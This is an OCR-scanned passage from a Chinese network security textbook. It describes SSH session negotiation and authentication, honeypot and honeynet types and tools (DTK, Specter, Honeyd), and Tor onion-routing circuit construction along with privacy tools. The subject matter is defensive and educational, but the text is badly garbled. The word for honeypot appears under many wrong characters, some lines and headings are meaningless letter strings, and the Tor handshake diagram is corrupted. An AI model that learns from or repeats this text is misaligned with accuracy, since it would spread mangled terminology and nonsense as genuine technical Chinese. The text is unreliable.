到 性 能 问题 ， 会 话 加 密 采 用 对 称 加 密 机 制 ， 使 用 公 钥 体系 来 保障 会 话 密 钥 的 安全 传输 。 

具体 做 法 是 ， 服务 端 发 送 主机 密 钥 公 钥 部 分 、 服 务 密 钥 公 钥 部 分 、 一 个 64 位 的 随 
机 数 和 支持 的 加 密 算法 等 信息 给 客户 端 ， 客 户 端 生成 会 话 密 铀 ， 并 用 服务 端 主机 公 钥 、 
服务 端 服 务 公 钥 等 要 素 对 会 话 密 钥 进行 加 密 并 传送 给 服务 端 ， 服 务 端 收 到 加 密 字符 串 后 
用 自己 的 各 种 私 钥 解 出 会 话 密 钥 。 此 时 ， 会 话 密 钥 已 安全 传送 ， 双 方 可 以 使 用 该 密 钥 加 

(3) 认证 

会 话 密 钥 协 商 后 ， 双 方 进 入 认证 阶段 。 客 户 端 首先 向 服务 端 发 送 用 户 名 ， 服 务 端 检 
查 用 户 是 否 存在 ， 如 果 该 用 户 不 存在 则 返回 相应 信息 以 示 该 用 户 不 存在 ， 如 果 该 用 户 存 
在 则 通知 客户 “现在 可 以 发 送 认 证 请 求 了 ”。 客 户 端 收 到 “该 用 户 存在 ”的 信息 ， 客 户 端 
按照 已 经 设 好 的 认证 方式 向 服务 端 提出 认证 请 求 。 对 任何 一 个 申请 ， 如 果 服 务 端 接受 ， 
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服务 端 就 发 送 “ 接 受 该 认证 ”的 信息 给 客户 端 ， 否 则 ， 以 “无 法 识别 该 认证 方式 ”回应 。 

(4) 会 话 模式 

客户 端 通过 服务 端 认证 后 ， 发 送 会 话 请 求 ， 这 些 请 求 包括 数据 压缩 、 端 口 转发 、 运 
行 shell、 执 行 命令 等 。 服 务 端 一 一 审查 这 些 请 求 ， 并 返回 相应 信息 。 

SSH 协议 最 重要 的 特点 和 功能 是 加 密 和 认证 。 从 SSH 的 体系 结构 和 连接 建立 过 程 
看 ，SSH 始终 都 围绕 怎么 更 好 、 更 安全 的 加 密 (保护 会 话 密 钥 ) 和 认证 来 工作 。 

SSH 的 应 用 软件 有 很 多 。 基 于 Windows2000 的 SSH 应 用 软件 有 Vshell、ssh2-2.4.0、 
win-server, F-SecureSSH, WINSSHD 等 。 而 在 LINUX 下 面 最 具 代 表 性 的 SSH 软件 是 
OpenSSH. 


3.4.6 W RHEE 


3.4.6.1 EEROR 

EME (Honeypot) 技术 是 一 种 主动 防御 技术 ,是 入 侵 检测 技术 的 一 个 重要 发 展 方向 。 

蜜 缸 是 一 种 在 互联 网 上 运行 的 计算 机 系统 ， 是 专门 为 吸引 并 诱 纹 那些 试图 非法 间 入 
他 人 计算 机 系统 的 人 而 设计 的 。 蜜 饶 系 统 是 一 个 包含 漏洞 的 诱 驴 系 统 ， 它 通过 模拟 一 个 
或 多 个 易 受 攻击 的 主机 和 服务 ， 给 攻击 者 提供 一 个 容易 攻击 的 目标 。 由 于 蜜 饶 并 没有 向 
外 界 提 供 真正 有 价值 的 服务 ， 因 此 所 有 试图 与 其 进行 连接 的 行为 均 可 认为 是 可 疑 的 ， 同 
时 让 攻击 者 在 蜜 钒 上 浪费 时 间 ， 延 缓 对 真正 目标 的 攻击 ， 从 而 使 目标 系统 得 到 保护 。 由 
于 蜜 缸 技术 的 特性 和 原理 ， 使 得 它 可 以 对 入 侵 的 取证 提供 重要 的 信息 和 有 用 的 线索 ， 便 
于 研究 入 侵 者 的 攻击 行为 。 从 这 个 意义 上 讲 ， 密 缸 是 一 个 “诱捕 ”攻击 者 的 陷阱 。 虽 然 
蜜 饶 不 会 直接 提高 计算 机 网 络 安全 ， 但 它 却 是 其 他 安全 策略 不 可 替代 的 一 种 主动 防御 
技术 。 

蜜 负 系统 最 主要 的 功能 是 对 系统 中 所 有 的 操作 和 行为 进行 监视 和 记录 。 通 过 对 系统 
进行 伪装 , 使 得 攻击 者 在 进入 到 蜜 缸 系统 后 并 不 会 知晓 其 行为 已 经 处 于 系统 的 监视 之 中 
然后 根据 所 有 攻击 行为 分 析 攻 击 的 方法 和 攻击 企图 。 

HELA: 

O 使 用 简单 : ADP Rec, RECO AE fa. EMEP EAN 
到 任何 特殊 的 计算 ， 不 需要 保存 特征 数据 库 ， 也 没有 需要 进行 配置 的 规则 库 。 

@ 资源 占用 少 : 蜜 龟 需 要 做 的 仅仅 是 捕获 进入 系统 的 所 有 数据 ， 对 那些 尝试 与 自 
己 建立 连接 的 行为 进行 记录 和 响应 ， 所 以 不 会 出 现 资源 耗 尽 的 情况 。 

© 数据 价值 高 : 蜜 缸 收集 的 数据 很 多 ， 但 是 它们 收集 的 数据 通常 都 带 有 非常 有 价 
值 的 信息 。 安 全 防护 中 最 大 的 问题 之 一 是 从 成 千 上 万 的 网 络 数据 中 寻找 自己 所 需要 的 
数据 。 

@ 数据 收集 面 狭窄 : 如 果 没 有 人 攻击 蜜 缸 ， 它 们 就 变 得 毫 无 用 处 。 如 果 攻 击 者 辩 
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别 出 用 户 的 系统 为 蜜 缸 ， 它 就 会 避免 与 该 系统 进行 交互 并 在 密 缸 没有 发 觉 的 情况 下 潜入 
用 户 所 在 的 组 织 。 

@ 给 使 用 者 带 来 风险 : 蜜 钢 可 能 为 用 户 的 网 络 环境 带 来 风险 ， 蜜 钢 一 旦 被 攻陷 ， 
就 可 以 用 于 攻击 、 潜 入 或 危害 其 他 的 系统 或 组 织 。 

蜜 缸 不 仅 可 以 作为 独立 的 信息 安全 工具 , 还 可 以 与 其 他 安全 工具 (比如 防火 墙 和 IDS 
等 ) 协作 使 用 ， 从 而 取长补短 地 对 入 侵 者 进行 检测 。 密 缸 可 以 查找 并 发 现 新 型 攻击 和 新 
型 攻击 工具 ， 从 而 解决 了 IDS 中 无 法 对 新 型 攻击 迅速 做 出 反应 的 缺点 。 

面 对 不 断 改进 的 黑客 技术 ， 无 论 是 商用 的 蜜 饶 还 是 免费 的 密 缸 软件 ， 蜜 饶 技术 要 持 
续 目前 具有 的 所 有 功能 就 必须 不 断 发 展 和 更 新 ， 模 拟 更 多 的 服务 、 更 多 的 操作 系统 ， 提 
高 蜜 缸 与 入 侵 者 之 间 的 交互 程度 ， 真 正 达到 以 假 乱 真 、 以 假 示 真 的 目的 。 
3.4.6.2 iA 

ASG AS Tad YY a HE HI AXT RE RE ACE AT AB I PE 

ACG HB A WRR RERED Dy PS PY AE ER RR FY a 
LARP AAAS SZ FC BU BUH DING T ERIP PAA eH te SRS A E ET 
SEH CEE BEM Boat, RN EPR Hal. WARR we PT Ee A 
DU Batis ON Ah TK E E BC EE AE FEA I TS I 2 I JE 
寻找 能 够 对 付 这 些 威胁 更 好 的 方式 。 

根据 蜜 缸 与 攻击 者 之 问 进行 的 交互 对 蜜 缸 进行 分 类 ， 可 以 将 蜜 缸 分 为 三 类 : 低 交 互 
密 镀 、 中 交互 蜜 镀 和 高 交互 蜜 炙 ， 用 于 衡量 攻击 者 与 操作 系统 之 间 交 互 的 程度 。 这 三 种 
不 同 的 程度 也 可 以 说 是 蜜 钢 在 被 入 侵 程 度 上 的 不 同 ， 但 三 者 之 间 并 没有 明确 的 分 界 。 

低 交 互 蜜 钠 只 提供 一 些 特殊 的 虚假 服务 ， 这 些 服务 通过 在 特殊 端口 监听 来 实现 。 蜜 
钠 为 攻击 者 展示 的 所 有 攻击 弱点 和 攻击 对 象 都 不 是 真正 的 产品 系统 ， 而 是 对 各 种 系统 及 
其 提供 的 服务 的 模拟 。 

中 交互 蜜 钠 提 供 了 更 多 的 交互 信息 ， 但 还 是 没有 提供 一 个 真实 的 操作 系统 。 通 过 这 
种 较 高 程度 的 交互 ， 更 复杂 些 的 攻击 手段 就 可 以 被 记录 和 分 析 。 中 交互 蜜 久 是 对 真正 的 
操作 系统 的 各 种 行为 的 模拟 ， 在 这 个 模拟 行为 的 系统 中 ， 用 户 可 以 进行 各 种 随心 所 欲 的 
配置 ， 让 蜜 钠 看 起 来 和 一 个 真正 的 操作 系统 没有 区 别 。 

高 交互 蜜 缸 具有 一 个 真实 的 操作 系统 ， 它 收集 信息 可 能 性 、 吸 引 攻 击 者 攻击 的 程度 
也 大 大 提高 ， 但 同时 随 着 复杂 程度 的 提高 危险 性 也 随 之 增 大 。 黑 客 攻 入 系统 的 目的 之 一 
就 是 获取 root 权限 ， 一 个 高 交互 级 别 的 蜜 色 就 提供 了 这 样 的 环境 。 高 交互 蜜 钢 是 完全 真 
实 的 系统 ， 设 计 的 最 主要 目的 是 对 各 种 网 络 攻 击 行为 进行 研究 。 高 交互 密 钢 最 大 的 缺点 
是 被 入 侵 的 可 能 性 很 高 。 

根据 蜜 负 主 机 所 采用 的 技术 分 类 ， 蜜 钠 可 以 分 为 三 种 基本 类 型 :牺牲 型 蜜 钠 
(Sacrificiallambs)、 外 观 型 蜜 钠 (Facades) 和 测量 型 蜜 色 (InstrumentedSystems)。 

牺牲 型 蜜 缸 就 是 一 台 简 单 的 为 某 种 特定 攻击 设计 的 计算 机 。 牺 牲 型 蜜 缸 实际 上 是 放 


第 3 章 网 络 安全 基础 


置 在 易 受 攻击 地 点 ， 假 扮 为 攻击 的 受害 者 。 它 为 攻击 者 提供 了 极 好 的 攻击 目标 。 不 过 提 
取 攻 击 数 据 比较 费时 ， 并 且 它 本 身 也 会 被 攻击 者 利用 来 攻击 其 他 的 机 器 。 

外 观 型 蜜 缸 技术 仅仅 对 网 络 服务 进行 仿真 而 不 会 导致 机 器 真正 被 攻击 ， 因 此 蜜 饶 的 
安全 不 会 受到 威胁 。 外 观 型 蜜 缸 是 一 种 呈现 目标 主机 的 虚假 映像 的 系统 ， 通 常 作为 目标 
服务 或 应 用 的 仿真 软件 进行 各 项 工作 。 当 外 观 型 蜜 缸 受到 侦 听 或 攻击 时 ， 它 会 迅速 收集 
有 关 入 侵 者 的 信息 。 

测量 型 蜜 缸 建立 在 牺牲 型 密 缸 和 外 观 型 蜜 缸 的 基础 之 上 。 测 量 型 蜜 缸 为 攻击 者 提供 
了 高 度 可 信 的 系统 ， 非 常 容 易 访 问 但 是 很 难 绕 过 ， 同 时 ， 高 级 的 测量 型 蜜 缸 还 可 防止 攻 
击 者 将 系统 作为 进一步 攻击 的 跳板 。 
3.4.6.3 ” 密 镀 的 基本 配置 

在 受 防火 墙 保护 的 网 络 中 ， 蜜 镀 通 常 放置 在 防火 墙 的 外 部 或 放置 在 防护 程度 较 低 的 
服务 网 络 中 。 这 样 做 的 目的 是 让 攻击 者 可 以 轻松 地 获得 蜜 缸 提供 的 所 有 服务 。 这 样 才能 
达到 诱骗 入 侵 者 的 目的 ， 从 而 可 以 记录 入 侵 者 的 行为 。 蜜 铅 有 四 种 不 同 的 配置 方式 : 

© 诱骗 服务 (DeceptionService) 

。 弱化 系统 (WeakenedSystem) 

。 强化 系统 (HardenedSystem) 

。 用 户 模式 服务 器 (UserModeServer) 

如 图 3-77 是 一 个 蜜 钠 配 置 图 。 

诱骗 服务 是 指 在 特定 IP 服务 端口 上 进行 侦 听 , 并 像 其 他 应 用 程序 那样 对 各 种 网 络 请 
求 进行 应 答 的 应 用 程序 。 诱 骗 服 务 是 蜜 钠 的 基本 配置 ， 例 如 ， 可 以 将 诱骗 服务 配置 为 
Sendmail 服务 的 模式 后 ， 当 攻击 者 连接 到 蜜 钠 的 TCP/25 端口 时 ， 就 会 收 到 一 个 由 蜜 铅 
发 出 的 代表 Sendmail 版 本 号 的 标识 。 

弱化 系统 是 一 个 配置 有 已 知 攻击 弱点 的 操作 系统 ， 比 如 ， 系 统 安装 有 已 知 的 易 受 远 
程 攻击 的 RPC, Sadmind 和 mountd 等 。 这 种 配置 的 特点 是 ， 恶 意 攻击 者 更 容易 进入 系 
统 ， 系 统 可 以 收集 有 关 攻 击 的 数据 。 

强化 系统 是 对 弱化 系统 配置 的 改进 。 强 化 系统 并 不 配置 一 个 看 似 有 效 的 系统 ， 蜜 钢 
管理 员 为 基本 操作 系统 提供 所 有 自己 知道 的 安全 补丁 , 使 系统 的 每 个 服务 变 得 足够 安全 。 
一 旦 攻击 者 闻 入 “足够 安全 ”的 服务 中 ， 蜜 钢 就 开始 收集 攻击 者 的 行为 信息 ， 一 方面 可 
以 为 加 强 防御 提供 依据 ， 另 一 方面 可 以 为 执法 机 构 和 取证 机 构 提 供 证 据 。 配 置 强化 系统 
是 在 最 短 时 间 内 收集 最 多 有 效 数 据 的 最 好 方法 。 

将 密 缸 配置 为 用 户 模式 服务 器 是 相对 较 新 的 观点 。 用 户 模式 服务 器 是 一 个 用 户 进 
程 ， 它 运行 在 主机 上 ， 并 模拟 成 一 个 功能 健全 的 操作 系统 ， 类 似 用 户 通常 使 用 的 操作 系 
统 。 例 如 可 以 同时 运行 文字 处 理 器 、 电 子 数据 表 和 电子 邮件 等 应 用 程序 。 如 果 配 置 适当 ， 
攻击 者 几乎 无 法 察觉 他 们 链接 的 是 用 户 模式 服务 器 而 不 是 真正 的 目标 主机 ， 也 就 不 会 得 
知 自己 的 行为 已 经 被 记录 下 来 。 
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DTK (DeceptionToolkit) 是 一 种 免费 的 蜜 缸 软件 。DTK 为 攻击 者 展示 的 是 一 个 具有 
很 多 常见 攻击 弱点 的 系统 。DTK 吸引 攻击 者 的 诡计 就 是 可 执行 性 , 但 是 它 与 攻击 者 进行 
交互 的 方式 是 模仿 那些 具有 可 攻击 弱点 的 系统 进行 的 ， 所 以 可 以 产生 的 应 答 非常 有 限 。 
DTK 仅仅 监听 输入 并 产生 看 起 来 正常 的 应 答 。 在 这 个 过 程 中 对 所 有 的 行为 进行 记录 ， 同 
时 提供 较为 合理 的 应 答 ， 并 给 冯 入 系统 的 攻击 者 带 来 系统 并 不 安全 的 错觉 。 

Specter 是 一 种 低 交 互 蜜 缸 ， 主 要 功能 是 模拟 服务 。 除 了 可 以 模拟 服务 之 外 ， 它 还 可 
以 模拟 多 种 不 同类 型 的 操作 系统 ， 而 且 操 作 简 单 并 且 风 险 很 低 。Specter 可 以 快速 并 轻松 
地 检测 并 判断 出 谁 在 做 什么 。Specter 由 两 部 分 组 成 : 引擎 部 分 和 控制 部 分 。 引 擎 部 分 进 
行 数据 包 嗅 探 并 对 各 种 网 络 连接 进行 处 理 ， 而 控制 部 分 则 是 提供 图 形 用 户 界 面 供 使 用 者 
进行 各 项 配置 。 所 有 的 配置 都 可 以 在 一 个 界面 内 完成 ， 每 个 选项 都 有 一 个 相关 的 帮助 
按钮 。 
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目前 ，Specter 系统 可 以 模拟 九 类 操作 系统 ， 即 : 
e WindowsNT. 

Windows95/98 。 

e MacOS. 

e Linux. 

SunOS/Solaris. 

e DigitalUNIX. 

NeXTStep. 

e Irix。 

e UnisysUNIX. 

Specter 可 以 模拟 五 种 不 同 的 网 络 服务 一 一 SMTP、FTP、Telnet、Finger 和 Netbus. 
还 可 以 模拟 七 种 陷阱 (特定 端口 的 连接 ， 比 如 DNS, HTTP, Sun-RPC, POP3, IMAP4 
All BackOrifice)。 所 有 连接 的 记录 都 具有 远程 主机 的 他 地址 、 确 切 时 间 、 服 务 类 型 和 连 
接 建立 时 引擎 的 状态 等 信息 ， 还 提供 一 个 用 户 自 定义 陷阱 ， 系 统管 理 员 可 以 指定 进行 监 
控 的 端口 。 

Honeyd 是 一 种 很 强大 的 具有 开放 源 代 码 的 蜜 缸 , 运行 在 UNIX 系统 上 , 可 以 同时 模 
仿 400 多 种 不 同 的 操作 系统 和 上 千 种 不 同 的 计算 机 。Honeyd 不 仅 可 以 像 Specter 那样 在 
应 用 层 模 仿 操作 系统 , 还 可 以 在 TCP/IP 层 模仿 操作 系统 。 这 就 意味 着 如 果 有 人 闽 入 用 户 
HEMER, 服务 和 TCP/IP 栈 都 会 模拟 操作 系统 做 出 各 种 响应 , 可 以 完成 的 工作 包括 虚拟 
nmap 或 xprobe、 调 节 分 配 重组 策略 以 及 调节 FIN 扫描 策略 。 

而 Honeyd 与 其 他 蜜 缸 不 同 。 无 论 端口 上 是 否 有 被 监听 的 服务 ，Honeyd 都 可 以 检测 
并 记录 该 端口 上 的 连接 。Honeyd 不 仅 可 以 模拟 不 存在 的 系统 , 还 可 以 检测 任何 端口 上 的 
行为 ， 所 以 可 以 说 Honeyd 是 一 种 检测 非法 行为 的 有 效 工具 。 

此 外 , 还 有 许多 免费 和 商用 的 蜜 钠 软件 产品 , 如 : BOF, Home-made, SmokeDetector, 
Bigeye、NetFacade、KFSensor 和 Tiny 等 。 
3.4.6.5 Honeynet 

Honeynet 是 专门 为 研究 设计 的 高 交互 型 蜜 缸 ， 一 般 称 为 蜜 网 。 其 设计 目的 就 是 从 现 
存 的 各 种 安全 威胁 中 提取 有 用 的 信息 ， 发 现 新 型 的 攻击 工具 ， 确 定 攻击 的 模式 并 研究 攻 
击 者 的 攻击 动机 。 

Honeynet 不 是 一 个 单独 的 系统 而 是 由 多 个 系统 和 多 个 攻击 检测 应 用 组 成 的 网 络 。 这 
个 网 络 放置 在 防火 墙 的 后 面 ， 所 有 进出 网 络 的 数据 都 会 通过 这 里 ， 并 可 以 捕获 并 控制 这 
些 数 据 。 分 析 捕 获 的 数据 ， 就 可 以 得 到 攻击 组 织 所 使 用 的 工具 、 策 略 和 动机 。 

Honeynet 内 可 以 同时 包含 多 种 系统 ， 比 如 Solaris、Linux、WindowsNT、Cisco 路 由 
器 和 Alteon 交换 机 等 ， 这 样 就 可 以 创建 一 个 反映 真实 产品 情况 的 网 络 环境 。 不 仅 如 此 ， 
不 同 的 系统 可 以 采用 不 同 的 应 用 ， 比 如 LinuxDNS 服务 器 、WindowsIIS 网 络 服务 器 和 


a: 项 
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Solaris 数据 库 服务 器 ， 这 样 就 可 以 进行 不 同 工 具 和 策略 的 学 习 。 不 同 的 攻击 者 攻击 的 是 
特定 的 系统 、 应 用 或 弱点 。 拥 有 各 种 操作 系统 的 不 同 实际 应 用 ， 就 可 以 更 加 准确 地 概括 
不 同 攻击 者 的 不 同意 图 和 特点 。 

Honeynet 的 系统 都 是 标准 的 ,这些 系 统 和 应 用 都 是 用 户 可 以 在 互联 网 上 找到 的 真实 
系统 和 应 用 。 这 意味 着 该 网 络 中 的 任何 一 部 分 都 不 是 模拟 的 应 用 ， 而 这 些 应 用 都 具有 与 
真实 的 系统 相同 的 安全 等 级 。 因 此 , 在 Honeynet 中 发 现 的 漏洞 和 弱点 就 是 真实 存在 的 组 
织 所 需 改 进 的 问题 。 用 户 所 需 做 的 就 是 将 系统 从 产品 环境 移植 到 Honeynet 中 。 

所 有 的 Honeynet 都 必须 支持 信息 控制 和 信息 捕获 。 信息 控制 代表 了 一 种 规则 , 用 户 
必须 能 够 确定 自己 的 数据 包 能 够 发 送 到 什么 地 方 ， 是 对 入 侵 者 行为 的 规范 。 其 目的 是 ， 
当 用 户 Honeynet 内 的 蜜 饶 主机 被 入 侵 后 ， 它 不 会 被 用 来 攻击 Honevnet 以 外 的 机 器 和 组 
织 。 信 息 捕获 则 是 要 捕获 所 有 的 攻击 者 行为 ， 抓 到 攻击 组 织 的 所 有 数据 流 。 要 在 攻击 者 
没有 察觉 的 情况 下 ， 尽 量 多 的 捕获 有 关 攻 击 者 行为 的 数据 ， 并 使 到 达 蜜 钠 的 数据 尽量 真 
实 ; 同时 捕获 的 数据 不 能 存储 在 本 地 蜜 色 中 ， 以 免 被 攻击 者 发 现 。 只 有 做 到 这 两 点 ， 
Honeynet 的 使 用 者 才能 进一步 分 析 攻 击 者 所 使 用 的 工具 、 策 略 及 攻击 意图 。 


3.4.7 ”匿名 网 络 (Tor) 


3.4.7.1 Tor 简介 

Tor (TheOnionRouter) 或 许 不 是 网 络 匿 名 访问 的 唯一 手段 ， 但 毫 无 疑问 它 是 目前 最 
流行 、 最 受 开 发 者 欢迎 的 。 这 个 免费 、 开 源 的 程序 可 以 给 网 络 流量 进行 三 重 加 密 ， 并 将 
用 户 流量 在 世界 各 地 的 电脑 终端 里 跳跃 传递 , 这 样 就 很 难 去 追踪 它 的 来 源 。 大 部 分 的 Tor 
用 户 只 把 它 作 为 一 个 匿名 浏览 网 页 的 工具 ， 不 过 实际 上 它 潜力 十 足 : Tor 软件 可 以 在 操 
作 系 统 后 台 运行 ， 创 建 一 个 代理 链接 将 用 户 连接 到 Tor 网 络 。 随 着 越 来 越 多 的 软件 甚至 
操作 系统 都 开始 允许 用 户 选 择 通 过 Tor 链接 发 送 所 有 流量 ， 这 使 得 你 几乎 可 以 用 任何 类 
型 的 在 线 服 务 来 掩盖 自己 的 身份 。 


Tór 


TorProject.org 


图 3-78 Tor 的 logo 


Tor 是 第 二 代 洋 萄 路 由 Conionrouting) 的 一 种 实现 ， 用 户 通过 Tor 可 以 在 因特网 上 
进行 匿名 交流 。 
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流量 分 析 是 一 种 主要 的 网 络 的 监视 行为 。Tor 是 一 个 能 够 抵御 流量 分 析 的 软件 项 目 。 
Tor 将 通信 信息 通过 一 个 由 遍及 全 球 的 志愿 者 运行 的 中 继 (relay) 所 组 成 的 分 布 式 网 络 
转发 ， 以 此 来 保护 信息 的 安全 。Tor 在 传输 数据 时 封包 不 但 经 过 加 密 ， 传 输 过 程 中 会 经 
过 哪些 路 由 也 是 随机 的 ， 因 此 不 但 很 难 追 踪 ， 也 不 易 得 知 通信 的 内 容 。Tor 能 与 现 有 的 
许多 应 用 程序 配合 工作 ， 包 括 Web 浏览 器 、 即 时 通信 客户 端 、 远 程 登录 和 基于 TCP 协 
议 的 其 他 应 用 程序 。 

洋葱 代理 (OnionProxy, OP) 使 用 源 路 由 方式 随机 选择 洋葱 路 由 器 (OnionRouter， 
OR) 组 成 匿名 传输 路 径 ， 将 后 面 路 径 的 数据 和 地 址 一 同 加 密 作 为 前 段 路 径 P 包 的 载荷 
进行 传送 ， 并 且 每 个 洋葱 路 由 器 只 和 相 邻 的 洋 萄 路 由 器 通信 并 传输 数据 ， 这 样 就 能 有 效 
隐藏 了 目的 节点 。 当 用 户 有 匿名 需求 ， 通 过 OP 从 目录 服务 器 下 载 Tor 网 络 状态 信息 。 
然后 会 根据 得 到 的 洋葱 路 由 ， 构 建 一 条 转发 路 径 。 每 个 洋 萄 路 由 器 担任 传输 中 继 ， 而 且 
这 些 洋葱 路 由 只 和 相 邻 的 洋 萄 路 由 进行 通信 并 传输 数据 。 

如 图 3-79， 假 定 Alice 是 我 们 的 OP 〈 客 户 端 )， 通 过 Tor 随机 选择 一 个 Tor 匿名 网 
络 中 的 路 由 器 作为 Tor 网 络 的 接 入 点 并 且 与 这 个 路 由 器 进行 短期 的 回话 密 钥 协商 ， 然 后 
逐 跳 扩展 匿名 链 路 ， 直 到 到 达 目 标点 。 

在 连接 的 建立 阶段 ， 是 由 消息 的 发 送 者 的 洋 获 代理 路 由 器 OP 来 选择 创建 整 条 匿名 
路 径 的 。 客 户 端 通过 OP 选择 一 条 通过 网 络 的 路 径 并 构造 一 个 环 路 〈circuit， 虚 拟 环 路 )。 
在 这 个 环 路 里 每 一 个 在 路 径 上 OR GEAR AE) 知道 它 的 前 序 节点 和 后 序 节点 ， 但 是 
不 知道 在 环 路 里 的 任意 的 其 他 节点 。 客 户 端的 OP 首先 根据 目录 服务 器 中 获得 所 有 OR 
的 信息 ， 按 照 预 定 的 算法 选择 一 个 路 由 节点 加 入 通信 线路 ， 使 用 Diffie-Hellman 握手 协 
商 通 信 对 称 密 钥 建立 通信 和 链 路 ， 以 及 对 通信 数据 加 密 。 

在 新 的 虚拟 电路 建立 过 程 中 ， 用 户 的 OP 会 以 每 次 一 跳 的 进度 ， 递 增 的 构建 线路 ， 
图 3-79 即 为 Tor 建立 一 个 新 的 通信 虚拟 电路 的 过 程 ， 用 户 的 OP (Alice) 在 选 定 的 路 径 
中 发 送 一 个 createdcell 到 第 一 个 中 继 路 由 节点 〈Bob )， 并 标志 以 一 个 新 的 链 路 编号 
circID Cag 。 这 个 createdcell 的 负载 包括 Diffie-Hellman 握手 〈g* ) 的 前 一 半 ， 用 那个 
OR (Bob) 的 洋葱 密 钥 来 加 密 。Bob 以 一 个 包括 g” 和 协商 密 钥 的 哈 希 K=g” 的 已 建立 
单元 回应 。 一 旦 线路 被 建立 起 来 ，Alice 和 Bob 可 以 互相 发 送 以 协商 密 钥 加 密 的 转播 单 
元 。 为 了 将 线路 扩展 ，Alice 发 送 一 个 转发 扩展 单元 给 Bob， 指 明 下 一 个 OR〈Carol) 的 
地 址 和 给 她 的 加 密 过 的 g .Bob 复制 半 个 握手 到 建立 单元 , 并 发 送 给 Carol 来 扩展 电路 ， 
并 将 此 线路 赋 以 新 的 circID Cgc o Alice 无 须知 道 这 个 circID; Bob 只 使 用 Cys 和 Alice 连 
接 ， 只 使 用 Csc 和 Carol 连接 。 当 Carol 回应 一 个 已 建立 单元 后 ，Bob 将 负载 打包 为 转播 
已 扩展 单元 并 把 它 传 给 Alice。 现在 线路 已 经 扩展 到 Carol, 而 且 Alice 和 Carol 共享 一 个 
共同 的 密 钥 K=g”? 。Alice 只 需 按 照 上 面 的 步骤 并 告诉 线路 中 的 最 后 一 个 节点 再 扩展 一 
跳 ， 就 可 以 将 线路 扩展 到 第 三 个 节点 。 
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Alice(OP) (TLS 加 密 的 连接 ) ORI(Bob) (TLS 加 密 的 连接 ) OR2(Canrol) (未 加 密 的 连接 ) lebsite 
Creat Cag, E(g^x1 
reat Cas, E(g^x1) UH: 
E(x) 表 示 RSA 加 密 算法 
Created Cass 8°Y1,H (K1) {(X} RTAESH ERA 
Cs 表示 CircID 
Relay Ca,{Extend,OR2,E(g*x2)} 
Create Cec,E (g*x2) 


Create Cyc.g“v2,H (K2) 
Relay Cay {Extend,g*v2,H(K2)} 


Relay Cas{{Begin<Website>:80} } 


Relay Cyc{Begin<Website>:80} 


Relay Cyc{Conneeted} 


Relay Cant Conneeted} 


Relay Can{ {Data, HTTP GET… }} 


Relay Cec{ {Data, HTTP GET- }} 
HTTP GET = 


Relay Cac{Data,response} (响应 ) 


Relay C,,{{Data,response} } 


t t 


图 3-79 Tor 链 路 建立 过 程 图 


虚拟 电路 的 建立 是 在 Tor 初始 化 运行 环境 的 基础 上 ， 生 成 用 来 确定 身份 信息 和 加 密 
传输 数据 的 公 钼 ， 即 所 需要 的 身份 密 钥 和 洋葱 密 钥 ， 首 先 选 取 入 口 路 由 节点 建立 AP 连 
接 ， 继 而 根据 目前 已 知 的 路 由 节点 扩展 转发 节点 链 路 ， 完 成 中 继 路 由 节点 的 随机 选择 ， 
OP 节点 通过 已 建立 的 信道 , 继续 将 连接 拓展 至 其 他 的 OR 节点 , 直至 扩展 最 后 一 跳 路 
节点 ， 作 为 退出 节点 ， 建 立 一 条 多 层 加 密 信道 。 

Tor 浏览 器 是 非 钥 利 性 质 的 Tor 项 目 开发 的 一 款 免费 应 用 。 它 是 火狐 浏览 器 的 安全 
强化 版 ， 可 以 把 你 所 有 的 网 络 流量 都 通过 Tor 的 匿名 网 络 加 密 。 得 益 于 三 重 加 密 系 统 和 
让 流量 在 全 球 的 电脑 上 传递 ，Tor 浏览 器 可 能 是 最 接近 真正 的 网 络 匿名 的 工具 。 

想 发 送 匿名 邮件 ?最 简单 的 方法 是 使 用 Tor 浏览 器 的 电子 邮件 服务 。 不 过 首先 你 需 
要 在 TorMail 申请 一 个 新 邮箱 (该 服务 已 于 2013 年 8 H 10 日 下 线 )。 不 同 于 其 他 需要 提 
供 手 机 号 码 才 能 申请 的 邮箱 (比如 Gmail)， 申 请 Tor 邮箱 无 须 提供 任何 个 人 信息 。 还 有 
一 款 一 次 性 的 电子 邮件 服务 : GuerrillaMail。 只 需 轻 轻 一 点 ， 你 就 可 以 建立 一 个 新 的 、 随 
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机 生成 的 邮箱 。 如 果 和 Tor 浏览 器 结合 使 用 则 效果 拔 群 : 没 人 (包括 GuerrillaMail 本 身 ) 
能 通过 这 个 临时 邮箱 追踪 到 你 的 IP 地 址 。 然 而 对 电子 邮件 进行 信息 加 密 可 不 是 件 容易 的 
事 。 用 户 通常 需要 通过 复制 和 粘贴 来 把 信息 和 弄 进 文本 框 ， 然 后 还 要 使 用 PGP 
(PrettyGoodPrivacy， 一 个 隐私 保护 程序 ) 来 加 密 和 解密 。 为 了 避免 这 一 麻烦 ， 可 以 使 用 
有 隐私 保护 的 邮件 服务 商 ， 比 如 Riseupnet， 或 者 使 用 Mozilla 开发 的 邮件 程序 
Thunderbird、 隐 私 插件 Enigmail 或 者 可 以 通过 Tor 发 送信 息 的 插件 TorBirdy。Adium 和 
Pidgin 是 Mac 以 及 Windows 上 最 常用 的 支持 加 密 协 议 OTR 的 即时 通讯 客户 端 ，Tor 也 
同样 支持 该 软件 。 不 过 Tor 现在 正在 打造 一 款 更 安全 的 匿名 即时 通信 软件 ，InstantBird。 

GoogleDrive 和 Dropbox 在 用 户 隐私 方面 做 得 并 不 好 ， 而 Onionshare 是 一 个 可 以 让 
任何 人 通过 Tor 传送 大 文件 的 开源 软件 。 当 你 使 用 它 时 ， 程 序 会 通过 “Tor 隐藏 服务 
(TorHiddenService)”， 创建 一 个 本 地 的 、 临 时 的 匿名 网 站 。 文 件 接 收 方 需要 得 到 一 个 
以 .onion 为 后 级 的 文件 地 址 ， 然 后 就 可 以 通过 Tor 浏览 器 安全 、 匿 名 地 下 载 文 件 了 。 

手机 以 及 平板 电脑 上 的 匿名 工具 开发 还 远 远 落后 于 电脑 ， 不 过 它们 正在 迎头 赶 上 。 
“和 守卫 项 目 〈TheGuardianProject)” 开 发 了 一 个 叫 Orbot 的 App, HETE Android 系统 上 使 
用 Tor 了 。 手 机 上 的 浏览 器 、 电 子 邮 件 和 信息 都 能 通过 Orbot 设置 成 使 用 Tor 代理 。iOS 
设备 目前 还 没有 这 类 服务 。 不 过 iOS 的 应 用 程序 商店 里 有 Onion 浏览 器 ， 这 可 以 帮助 
